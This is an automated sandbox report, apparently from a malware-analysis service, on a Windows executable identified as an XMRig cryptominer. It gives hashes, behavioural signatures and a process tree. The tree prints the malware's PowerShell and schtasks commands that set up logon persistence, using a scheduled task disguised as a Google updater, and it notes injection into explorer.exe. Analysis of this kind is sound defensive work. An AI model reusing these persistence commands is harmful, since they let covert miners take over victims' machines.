Analysis
- max time kernel: 109s
- max time network: 130s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 27/10/2024, 15:34

Static task: static1
Behavioral task: behavioral1
- Sample: 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
- Resource: win7-20240903-en
General
- Target: 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
- Size: 9.8MB
- MD5: 6f804d98df32ee28685d8468e619dd87
- SHA1: cc4813865c1600e7c7b772d692a37dd752a7cc6a
- SHA256: 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa
- SHA512: af1280f4db7b70f9a94f20837258a5a6ca7cbbe1a4cc44d0b938a10290496802793d631e4cce155597dfc05243624013750310a2baf260c085f29316682d37c4
- SSDEEP: 196608:NfZ+pJEfu095vo5n8xnzv0jr+ao/hNJu+y19RERUAc9s:Nsx09xo5m70nm5NJuVRERUAY
Malware Config
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess (5 IoCs)
  description | pid | Process | procid_target
  PID 2504 created 1184 | 2504 | 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe | 21
  PID 2504 created 1184 | 2504 | 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe | 21
  PID 2748 created 1184 | 2748 | uwpdater.exe | 21
  PID 2748 created 1184 | 2748 | uwpdater.exe | 21
  PID 2748 created 1184 | 2748 | uwpdater.exe | 21
Xmrig family

XMRig Miner payload (14 IoCs)
  resource | yara_rule
  behavioral1/memory/2748-27-0x000000013F2D0000-0x000000013FC99000-memory.dmp | xmrig
  behavioral1/memory/2712-30-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/2712-32-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/2712-34-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/2712-36-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/2712-38-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/2712-40-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/2712-42-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/2712-44-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/2712-46-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/2712-48-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/2712-50-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/2712-52-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
  behavioral1/memory/2712-54-0x0000000140000000-0x00000001407EF000-memory.dmp | xmrig
Executes dropped EXE (1 IoC)
  pid | Process
  2748 | uwpdater.exe

Loads dropped DLL (1 IoC)
  pid | Process
  2680 | taskeng.exe

Command and Scripting Interpreter: PowerShell
  pid | Process
  2336 | powershell.exe
  2156 | powershell.exe
Drops file in System32 directory (2 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Suspicious use of SetThreadContext (2 IoCs)
  description | pid | Process | procid_target
  PID 2748 set thread context of 2804 | 2748 | uwpdater.exe | 41
  PID 2748 set thread context of 2712 | 2748 | uwpdater.exe | 42
Scheduled Task/Job: Scheduled Task (1 TTPs, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  2324 | schtasks.exe
  2564 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (12 IoCs)
  pid | Process
  2504 | 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
  2504 | 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
  2336 | powershell.exe
  2504 | 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
  2504 | 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
  2748 | uwpdater.exe
  2748 | uwpdater.exe
  2156 | powershell.exe
  2748 | uwpdater.exe
  2748 | uwpdater.exe
  2748 | uwpdater.exe
  2748 | uwpdater.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 2336 | powershell.exe
  Token: SeDebugPrivilege | 2156 | powershell.exe
  Token: SeLockMemoryPrivilege | 2712 | explorer.exe
  Token: SeLockMemoryPrivilege | 2712 | explorer.exe
Suspicious use of FindShellTrayWindow (64 IoCs)
  pid | Process
  2712 | explorer.exe (this identical row is repeated 64 times in the report)
Suspicious use of SendNotifyMessage (64 IoCs)
  pid | Process
  2712 | explorer.exe (this identical row is repeated 64 times in the report)
Suspicious use of WriteProcessMemory (11 IoCs)
  description | pid | Process | procid_target
  PID 2336 wrote to memory of 2324 | 2336 | powershell.exe | 33
  PID 2336 wrote to memory of 2324 | 2336 | powershell.exe | 33
  PID 2336 wrote to memory of 2324 | 2336 | powershell.exe | 33
  PID 2680 wrote to memory of 2748 | 2680 | taskeng.exe | 37
  PID 2680 wrote to memory of 2748 | 2680 | taskeng.exe | 37
  PID 2680 wrote to memory of 2748 | 2680 | taskeng.exe | 37
  PID 2156 wrote to memory of 2564 | 2156 | powershell.exe | 40
  PID 2156 wrote to memory of 2564 | 2156 | powershell.exe | 40
  PID 2156 wrote to memory of 2564 | 2156 | powershell.exe | 40
  PID 2748 wrote to memory of 2804 | 2748 | uwpdater.exe | 41
  PID 2748 wrote to memory of 2712 | 2748 | uwpdater.exe | 42
Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(Level numbers give the depth in the process tree; each entry lists the image path, the command line, the signatures triggered by that process, and its PID.)

Level 1: C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  PID: 1184

  Level 2: C:\Users\Admin\AppData\Local\Temp\3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa.exe"
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious behavior: EnumeratesProcesses
    PID: 2504

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wczaqphd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTwaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTwaskMachineQC' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2336

    Level 3: C:\Windows\system32\schtasks.exe
      Command line: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTwaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe'
      - Scheduled Task/Job: Scheduled Task
      PID: 2324

  Level 2: C:\Windows\System32\schtasks.exe
    Command line: C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTwaskMachineQC"
    PID: 2408

  Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wczaqphd#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTwaskMachineQC' /tr '''C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTwaskMachineQC' -RunLevel 'Highest' -Force; }
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2156

    Level 3: C:\Windows\system32\schtasks.exe
      Command line: "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTwaskMachineQC /tr 'C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe'
      - Scheduled Task/Job: Scheduled Task
      PID: 2564

  Level 2: C:\Windows\System32\conhost.exe
    Command line: C:\Windows\System32\conhost.exe
    PID: 2804

  Level 2: C:\Windows\explorer.exe
    Command line: C:\Windows\explorer.exe
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID: 2712

Level 1: C:\Windows\system32\taskeng.exe
  Command line: taskeng.exe {0FB85D99-CEBC-4790-A8DE-57083CED402F} S-1-5-21-3290804112-2823094203-3137964600-1000:VORHPBAB\Admin:Interactive:[1]
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID: 2680

  Level 2: C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe
    Command line: C:\Users\Admin\AppData\Roaming\Gowogle\Chwrome\uwpdater.exe
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 2748
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
- Filesize: 7KB
- MD5: 3bbed8e74c8ff53d762e23e157c46b11
- SHA1: fdee820f4138560d934884bcf67de8aa48620ef1
- SHA256: 53452eaab90c12e26ba00f0b645272c6aef33e2f936e88deaf4efae56e0bb83e
- SHA512: 01d26b9aa17077a8268ec29f80a8c848e1474d68ff193cec13f3ac0b56c604cd76bebc893e5e7d186e45301c60b7d7fe6db93710edeee4f47e2bd4af7bf4a185

(path not given in the report; the hashes match the submitted sample)
- Filesize: 9.8MB
- MD5: 6f804d98df32ee28685d8468e619dd87
- SHA1: cc4813865c1600e7c7b772d692a37dd752a7cc6a
- SHA256: 3b567592754e25eaa9246e3b267eebccaa870494c351b87ce2124f3e03a676aa
- SHA512: af1280f4db7b70f9a94f20837258a5a6ca7cbbe1a4cc44d0b938a10290496802793d631e4cce155597dfc05243624013750310a2baf260c085f29316682d37c4